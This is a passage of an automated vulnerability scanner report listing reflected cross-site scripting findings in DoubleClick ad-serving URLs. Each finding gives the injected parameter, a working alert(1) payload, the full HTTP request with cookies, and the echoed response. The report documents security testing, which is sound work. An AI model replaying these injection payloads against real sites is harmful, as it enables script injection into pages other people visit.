User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:42:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.346b85a"-alert(1)-"6cc9e163664&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

3.348. http://ad.doubleclick.net/adj/CBS.LASTFM.US/anonymoushome/anonymoushome/overview [source parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/CBS.LASTFM.US/anonymoushome/anonymoushome/overview

Issue detail

The value of the source request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecdce'%3balert(1)//dd13385a528 was submitted in the source parameter. This input was echoed as ecdce';alert(1)//dd13385a528 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/CBS.LASTFM.US/anonymoushome/anonymoushome/overview;source=ecdce'%3balert(1)//dd13385a528 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.last.fm/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 440
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:38:24 GMT
Expires: Wed, 27 Apr 2011 23:38:24 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/0/0/%2a/p;236878409;0-0;0;60397252;2321-160/600;41750209/41767996/1;;~fdr=237102522;0-0;0;60254165;2321-160/600;40916397/40934184/1;;~okv=;source=ecdce';alert(1)//dd13385a528;~sscs=%3fhttp://www.spritestepoff.com">
...[SNIP]...

3.349. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae18c"-alert(1)-"4d9707a94f7 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14ae18c"-alert(1)-"4d9707a94f7&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
lick%3Bh%3Dv8/3af6/17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14ae18c"-alert(1)-"4d9707a94f7&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27
...[SNIP]...

3.350. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d1d5'-alert(1)-'3748f2b04a2 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=141d1d5'-alert(1)-'3748f2b04a2&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
lick%3Bh%3Dv8/3af6/17/14a/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=141d1d5'-alert(1)-'3748f2b04a2&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27
...[SNIP]...

3.351. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14101'-alert(1)-'9012cbf68f8 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=014101'-alert(1)-'9012cbf68f8&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
7684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=014101'-alert(1)-'9012cbf68f8&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/un
...[SNIP]...

3.352. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10872"-alert(1)-"acdc1d3a658 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=010872"-alert(1)-"acdc1d3a658&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
7684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=010872"-alert(1)-"acdc1d3a658&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/un
...[SNIP]...

3.353. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68bce'-alert(1)-'40306924c51 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=68bce'-alert(1)-'40306924c51&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
dlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=68bce'-alert(1)-'40306924c51&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_2
...[SNIP]...

3.354. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cabe4"-alert(1)-"97e05b8809f was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=cabe4"-alert(1)-"97e05b8809f&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
dlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=cabe4"-alert(1)-"97e05b8809f&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_2
...[SNIP]...

3.355. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5f09"-alert(1)-"b25a57f7a25 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=e5f09"-alert(1)-"b25a57f7a25&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
m.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=e5f09"-alert(1)-"b25a57f7a25&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_612
...[SNIP]...

3.356. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d369d'-alert(1)-'ea69ad5ad8d was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=d369d'-alert(1)-'ea69ad5ad8d&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
m.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=d369d'-alert(1)-'ea69ad5ad8d&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_612
...[SNIP]...

3.357. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bffa0"-alert(1)-"5c6282b8c0b was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=bffa0"-alert(1)-"5c6282b8c0b&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=bffa0"-alert(1)-"5c6282b8c0b&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-state
...[SNIP]...

3.358. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adf79'-alert(1)-'304d485a9b0 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=adf79'-alert(1)-'304d485a9b0&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=adf79'-alert(1)-'304d485a9b0&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-state
...[SNIP]...

